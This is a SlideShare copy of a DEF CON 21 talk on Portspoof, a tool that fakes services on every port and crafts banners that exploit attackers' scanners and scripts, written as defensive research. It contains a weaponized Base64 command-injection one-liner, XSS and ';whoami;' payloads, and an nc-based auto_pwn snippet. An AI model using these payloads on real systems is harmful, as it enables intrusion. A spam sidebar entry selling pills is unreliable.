SlideShare ist ein Scribd-Unternehmen logo
1 von 29
© 2012
Presented by:
Pwn’ing you(r) cyber offenders
Piotr Duszynski
@drk1wi
© 2012
;WHOAMI;#?
• Senior Security Consultant @Trustwave (OSCE, OSCP, …)
• In security field for the past 6 years, hacking since 9 …
• Enjoys security research, crazy road trips and good music
2
© 2012
What is this presentation about?
1. “Annoyance and Camouflage” (reconnaissance phase)
New defensive technique that renders your attacker‟s port scan results
nearly useless …
2. “Active (Offensive) Defense”
New attack vectors against you(r) attackers offensive toolbox …
• POC DEMO: example exploit for one of the well known scanners.
3
Active Defense in practice
© 2012© 2012
“To blind attackers’ tools”
The art of Annoyance and Camouflage
© 2012
A typical reconnaissance phase
• Standard case scenario (target system is behind a Firewall)
5
# nmap -sV -O portspoof.org
© 2012
Portspoof – implementation of the idea
6
What if (worst case scenario):
• All 65535 ports appear to be open …
*Portspoof will bind to a single port
• On every open port there appears to be a service listening…
*Portspoof will dynamically generate valid service signatures ~ 8000 supported
TASK: Get a precise view of all running services…
© 2012
Spicing up the reconnaissance phase
with Portspoof
• Worst case scenario (target system is behind the Portspoof) :
7
$ nmap –sV -p - -PN portspoof.org
…. You will need a lot of patience!
© 2012
Spicing up attackers‟ port scan results
8
Scanning statistics:
65.535 open ports (services)
~120 MB of sent data
30682 s (8.5h)
and few beers later …
© 2012
Spicing up attackers‟ port scan results
9
© 2012
Spicing up attackers‟ port scan results
10
… and somewhere in the
results you can find the
hidden message …
© 2012
Spicing up attackers‟ port scan results
• NMAP OS identification results
11
$ nmap –sV -O portspoof.org
© 2012
Spicing up attackers‟ port scan results
• NMAP OS identification results:
12
Device type: general purpose
Running (JUST GUESSING): Linux 3.X (93%)
OS CPE: cpe:/o:linux:linux_kernel:3
Aggressive OS guesses: Linux 3.2 (93%), Linux 3.0 (92%), Linux 3.0 - 3.2
(85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts: gTknkkuB, ouwH-rKWw, bWQnRo, ClFfHC, leLtAJg;
OSs: Unix, Windows, Linux, Solaris, NetWare;
Devices: print server, webcam, router, storage-misc, printer;
CPE: cpe:/o:microsoft:windows, cpe:/o:redhat:linux,
cpe:/o:sun:sunos,cpe:/o:novell:netware, cpe:/o:linux:linux_kernel
© 2012
Spicing up attackers‟ port scan results
• AMAP: $ amap -q portspoof.org 3000-3100
13
© 2012
Spicing up attackers‟ port scan results -
conclusions
• SYN/ACK/FIN/… stealth scans are no longer helpful!
• OS identification is a bit more challenging …
• Forces to generate a huge amount of traffic through service probes …
• Frustrates and forces to carry out a huge amount of arduous by your
attackers …
14
“Security by obscurity” -
but so is the mimicry in the
natural environment…
© 2012
Bypassing Portspoof
• There is no trivial way to detect false signatures
• IP Fragmentation and other network evasion techniques will not work
• Thread pool exhaustion (Full connect TCP DOS):
$ nmap -sV portspoof.org (30 parallel instances)
~ 999/1000 ports were found as open
ANTI-DOS SOLUTION:
1. Play with Portspoof thread count and client/thread parameters .
2. Use iptables mark rules and tc (traffic shaper).
15
Please send any bypass ideas to the portspoof mailing list ;)
© 2012
Portspoof tool
• User space software running without root priv. ! (no kernel
modules)
• Binds to just one port per instance (127.0.0.1:4444)
• Configurable through iptables:
- A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j
REDIRECT --to-ports 4444
16
© 2012© 2012
“Active (Offensive) Defense in practice”
exploiting your attackers‟ tools…
“The best defense is a good offense” - Sun Tzu (The Art of War)
© 2012
Automated exploitation through Nmap
Interesting injection points through NMAP service probe engine:
• Version fields
• Hosts fields
18
./portspoof –f fuzz_payloads –n fuzz_nmap_signatures
© 2012
Open source reporting tool:
XSS example
19
Nmap report generation tool nr.1 (anonymous)
Tip: Safari „Same Origin Policy‟ for file URIs doesn‟t work.
Regards to Michele Orru!
© 2012
Commercial port scanner:
non-Nmap XSS example
20
report generation tool nr. 2 (McAfee SuperScan 4.0)
XSS payload: partially UTF-7 encoded without parenthesis
© 2012
Public exploit script:
OS command injection example nr.3
21
Exploiting your attackers’ exploits :D
# Lotus CMS 3.0 eval() Remote Command Execution Exploit:
© 2012
Public exploit script:
OS command injection example
22
Portspoof exploiting payload: 80 “whoamin”
Exploits‟ new extra output:
Vulnerable code : $( cat “storage2” )
FAIL ----->
© 2012
Public exploit script:
OS command injection example
23
Creating a weaponized OS command injection payload one-liner for :
---------------------------------------------------------------------------------------------
/bin/basht-ct{perl,-e,$0,useSPACEMIME::Base64,B64_perl_payload }t
$_=$ARGV[0];~s/SPACE/t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));
-----------------------------------------------------------------------------------------------------
• Use t instead of spaces
• Use „Bash Brace Expansion‟ to address the lack of apostrophes
• Use regex to add additional t
• Import missing packages on the fly and execute Base64 encoded payload >:]
$(cat file)
© 2012
Public exploit script:
OS command injection example
24
Exploits‟ new extra output:
Vulnerable code : $( cat “storage2” )
© 2012
Public exploit script:
OS command injection example nr.4
25
cookie=
`printf "GET /jmx-console/ HTTP/1.1nHost: $1nn" | nc $1
$2| grep -i JSESSION | cut -d: -f2- | cut -d; -f1`
Code snippet from one of the „auto_pwn‟ scripts:
Portspoof exploiting payload: 80 “whoamin”
© 2012
Blind exploitation with Portspoof (aka.
Aggressive Honeypot)
26
Conclusions:
- Majority of exploits, reporting tools and scanning software
is exploitable with simple payloads … ;whoami;
- Auto-PWN scripts are usually dumb (they try to exploit all ports) …
To rule them all…
© 2012
In hunt for a vulnerable software …
Use your Google jutsu skills (previous examples were found in TOP10) :
27
And you will find many interesting targets…
Tip: search for .sh (~8000 results), .pl , etc.
© 2012© 2012
Nmap NSE script PWN Demo
© 2012
Thank you 
Portspoof URLs:
http://portspoof.org/
Mailing list:
portspoof-users-subscribe@portspoof.org
Git repository (including the presented exploits):
https://github.com/drk1wi/portspoof/
Contact me:
piotr[at]duszynski.eu (PGP fingerprint: FCD2 B5DA 1AE2 056F 4AC8
901D 7258 7496 ECCD 36F3)
http://twitter/drk1wi
29

Weitere ähnliche Inhalte

Andere mochten auch

Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
beltface
 

Andere mochten auch (20)

BSides London - Scapy Workshop
BSides London - Scapy WorkshopBSides London - Scapy Workshop
BSides London - Scapy Workshop
 
Ch 07 -- The Expert System
Ch 07 -- The Expert SystemCh 07 -- The Expert System
Ch 07 -- The Expert System
 
Wireshark course, Ch 05: Advanced statistics tools
Wireshark course, Ch 05: Advanced statistics toolsWireshark course, Ch 05: Advanced statistics tools
Wireshark course, Ch 05: Advanced statistics tools
 
Wireshark course, Ch 03: Capture and display filters
Wireshark course, Ch 03: Capture and display filtersWireshark course, Ch 03: Capture and display filters
Wireshark course, Ch 03: Capture and display filters
 
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking   Chapter 3 - Network and Computer Attacks - Eric VanderburgEthical hacking   Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
 
SSL basics and SSL packet analysis using wireshark
SSL basics and SSL packet analysis using wiresharkSSL basics and SSL packet analysis using wireshark
SSL basics and SSL packet analysis using wireshark
 
Ch 08 -- Ethernet & LAN Switching Troubleshooting
Ch 08 -- Ethernet & LAN Switching TroubleshootingCh 08 -- Ethernet & LAN Switching Troubleshooting
Ch 08 -- Ethernet & LAN Switching Troubleshooting
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
OSTU - Quickstart Guide for Wireshark (by Tony Fortunato)
OSTU - Quickstart Guide for Wireshark (by Tony Fortunato)OSTU - Quickstart Guide for Wireshark (by Tony Fortunato)
OSTU - Quickstart Guide for Wireshark (by Tony Fortunato)
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
 
Wireshark course, Ch 02: Introduction to wireshark
Wireshark course, Ch 02: Introduction to wiresharkWireshark course, Ch 02: Introduction to wireshark
Wireshark course, Ch 02: Introduction to wireshark
 
Ch 06 -- Bandwidth Delay and Jitter Issues
Ch 06 -- Bandwidth Delay and Jitter IssuesCh 06 -- Bandwidth Delay and Jitter Issues
Ch 06 -- Bandwidth Delay and Jitter Issues
 
Network Forensics: Packet Analysis Using Wireshark
Network Forensics: Packet Analysis Using WiresharkNetwork Forensics: Packet Analysis Using Wireshark
Network Forensics: Packet Analysis Using Wireshark
 
Wireshark
WiresharkWireshark
Wireshark
 
Footprinting tools for security auditors
Footprinting tools for security auditorsFootprinting tools for security auditors
Footprinting tools for security auditors
 
Wireshark
WiresharkWireshark
Wireshark
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wireshark
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
 
Wireshark
WiresharkWireshark
Wireshark
 
Security Attacks on RSA
Security Attacks on RSASecurity Attacks on RSA
Security Attacks on RSA
 

Kürzlich hochgeladen

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Kürzlich hochgeladen (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 

DEF CON 21 - "Pwn'ing You(r) Cyber Offenders"

  • 1. © 2012 Presented by: Pwn’ing you(r) cyber offenders Piotr Duszynski @drk1wi
  • 2. © 2012 ;WHOAMI;#? • Senior Security Consultant @Trustwave (OSCE, OSCP, …) • In security field for the past 6 years, hacking since 9 … • Enjoys security research, crazy road trips and good music 2
  • 3. © 2012 What is this presentation about? 1. “Annoyance and Camouflage” (reconnaissance phase) New defensive technique that renders your attacker‟s port scan results nearly useless … 2. “Active (Offensive) Defense” New attack vectors against you(r) attackers offensive toolbox … • POC DEMO: example exploit for one of the well known scanners. 3 Active Defense in practice
  • 4. © 2012© 2012 “To blind attackers’ tools” The art of Annoyance and Camouflage
  • 5. © 2012 A typical reconnaissance phase • Standard case scenario (target system is behind a Firewall) 5 # nmap -sV -O portspoof.org
  • 6. © 2012 Portspoof – implementation of the idea 6 What if (worst case scenario): • All 65535 ports appear to be open … *Portspoof will bind to a single port • On every open port there appears to be a service listening… *Portspoof will dynamically generate valid service signatures ~ 8000 supported TASK: Get a precise view of all running services…
  • 7. © 2012 Spicing up the reconnaissance phase with Portspoof • Worst case scenario (target system is behind the Portspoof) : 7 $ nmap –sV -p - -PN portspoof.org …. You will need a lot of patience!
  • 8. © 2012 Spicing up attackers‟ port scan results 8 Scanning statistics: 65.535 open ports (services) ~120 MB of sent data 30682 s (8.5h) and few beers later …
  • 9. © 2012 Spicing up attackers‟ port scan results 9
  • 10. © 2012 Spicing up attackers‟ port scan results 10 … and somewhere in the results you can find the hidden message …
  • 11. © 2012 Spicing up attackers‟ port scan results • NMAP OS identification results 11 $ nmap –sV -O portspoof.org
  • 12. © 2012 Spicing up attackers‟ port scan results • NMAP OS identification results: 12 Device type: general purpose Running (JUST GUESSING): Linux 3.X (93%) OS CPE: cpe:/o:linux:linux_kernel:3 Aggressive OS guesses: Linux 3.2 (93%), Linux 3.0 (92%), Linux 3.0 - 3.2 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Hosts: gTknkkuB, ouwH-rKWw, bWQnRo, ClFfHC, leLtAJg; OSs: Unix, Windows, Linux, Solaris, NetWare; Devices: print server, webcam, router, storage-misc, printer; CPE: cpe:/o:microsoft:windows, cpe:/o:redhat:linux, cpe:/o:sun:sunos,cpe:/o:novell:netware, cpe:/o:linux:linux_kernel
  • 13. © 2012 Spicing up attackers‟ port scan results • AMAP: $ amap -q portspoof.org 3000-3100 13
  • 14. © 2012 Spicing up attackers‟ port scan results - conclusions • SYN/ACK/FIN/… stealth scans are no longer helpful! • OS identification is a bit more challenging … • Forces to generate a huge amount of traffic through service probes … • Frustrates and forces to carry out a huge amount of arduous by your attackers … 14 “Security by obscurity” - but so is the mimicry in the natural environment…
  • 15. © 2012 Bypassing Portspoof • There is no trivial way to detect false signatures • IP Fragmentation and other network evasion techniques will not work • Thread pool exhaustion (Full connect TCP DOS): $ nmap -sV portspoof.org (30 parallel instances) ~ 999/1000 ports were found as open ANTI-DOS SOLUTION: 1. Play with Portspoof thread count and client/thread parameters . 2. Use iptables mark rules and tc (traffic shaper). 15 Please send any bypass ideas to the portspoof mailing list ;)
  • 16. © 2012 Portspoof tool • User space software running without root priv. ! (no kernel modules) • Binds to just one port per instance (127.0.0.1:4444) • Configurable through iptables: - A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444 16
  • 17. © 2012© 2012 “Active (Offensive) Defense in practice” exploiting your attackers‟ tools… “The best defense is a good offense” - Sun Tzu (The Art of War)
  • 18. © 2012 Automated exploitation through Nmap Interesting injection points through NMAP service probe engine: • Version fields • Hosts fields 18 ./portspoof –f fuzz_payloads –n fuzz_nmap_signatures
  • 19. © 2012 Open source reporting tool: XSS example 19 Nmap report generation tool nr.1 (anonymous) Tip: Safari „Same Origin Policy‟ for file URIs doesn‟t work. Regards to Michele Orru!
  • 20. © 2012 Commercial port scanner: non-Nmap XSS example 20 report generation tool nr. 2 (McAfee SuperScan 4.0) XSS payload: partially UTF-7 encoded without parenthesis
  • 21. © 2012 Public exploit script: OS command injection example nr.3 21 Exploiting your attackers’ exploits :D # Lotus CMS 3.0 eval() Remote Command Execution Exploit:
  • 22. © 2012 Public exploit script: OS command injection example 22 Portspoof exploiting payload: 80 “whoamin” Exploits‟ new extra output: Vulnerable code : $( cat “storage2” ) FAIL ----->
  • 23. © 2012 Public exploit script: OS command injection example 23 Creating a weaponized OS command injection payload one-liner for : --------------------------------------------------------------------------------------------- /bin/basht-ct{perl,-e,$0,useSPACEMIME::Base64,B64_perl_payload }t $_=$ARGV[0];~s/SPACE/t/ig;eval;$_=$ARGV[1];eval(decode_base64($_)); ----------------------------------------------------------------------------------------------------- • Use t instead of spaces • Use „Bash Brace Expansion‟ to address the lack of apostrophes • Use regex to add additional t • Import missing packages on the fly and execute Base64 encoded payload >:] $(cat file)
  • 24. © 2012 Public exploit script: OS command injection example 24 Exploits‟ new extra output: Vulnerable code : $( cat “storage2” )
  • 25. © 2012 Public exploit script: OS command injection example nr.4 25 cookie= `printf "GET /jmx-console/ HTTP/1.1nHost: $1nn" | nc $1 $2| grep -i JSESSION | cut -d: -f2- | cut -d; -f1` Code snippet from one of the „auto_pwn‟ scripts: Portspoof exploiting payload: 80 “whoamin”
  • 26. © 2012 Blind exploitation with Portspoof (aka. Aggressive Honeypot) 26 Conclusions: - Majority of exploits, reporting tools and scanning software is exploitable with simple payloads … ;whoami; - Auto-PWN scripts are usually dumb (they try to exploit all ports) … To rule them all…
  • 27. © 2012 In hunt for a vulnerable software … Use your Google jutsu skills (previous examples were found in TOP10) : 27 And you will find many interesting targets… Tip: search for .sh (~8000 results), .pl , etc.
  • 28. © 2012© 2012 Nmap NSE script PWN Demo
  • 29. © 2012 Thank you  Portspoof URLs: http://portspoof.org/ Mailing list: portspoof-users-subscribe@portspoof.org Git repository (including the presented exploits): https://github.com/drk1wi/portspoof/ Contact me: piotr[at]duszynski.eu (PGP fingerprint: FCD2 B5DA 1AE2 056F 4AC8 901D 7258 7496 ECCD 36F3) http://twitter/drk1wi 29

Hinweis der Redaktion

  1. Thanks for coming, start presentation
  2. shortly
  3. Results of my attempt to put some of the Active Defense concepts into practiceTechnique that aims at slowing down your attackers and keeping them from staying low profile (nearly- infinite time)Example based, that tries to show the potential that lies in Offensive Defense/automated (exploiting your attackers exploits)
  4. Knowledge is the key, port scan
  5. Starting point for every pentest …
  6. IdeaImplemented (Portspoof)Results?
  7. Get a precise view …
  8. Our offenders will get more information then they ever wanted…
  9. Closer lookA whole range of different services (possibly none or all of them are valid)So, you have finished the scan and still know almost nothing…
  10. Bonus protection (none port is closes)
  11. The same goes for other port scanners…
  12. TIME –TIME – STEALTH –
  13. User spaceNo rootEasy configurable
  14. - Exploiting attacker’s tools and exploitsExample based with few interesting vectors and examples (top of an ice mountain)
  15. Lets come back to Nmap again (due itspopoularity)Injection pointsPORTSPOFO OUTPUT - Set up our software to have different payloads on each port (good approach for automated tools)
  16. In practice if your system returns the following service banner (that will match Nmap regular expression).“Hello World” example
  17. Non Nmap based example
  18. Storage file content is under our controlSimple payload will exploit attackers machine
  19. You can use the previously created payload for automated exploitation
  20. Straigjtforward vulnerability Again whoami will exploit attackers machine…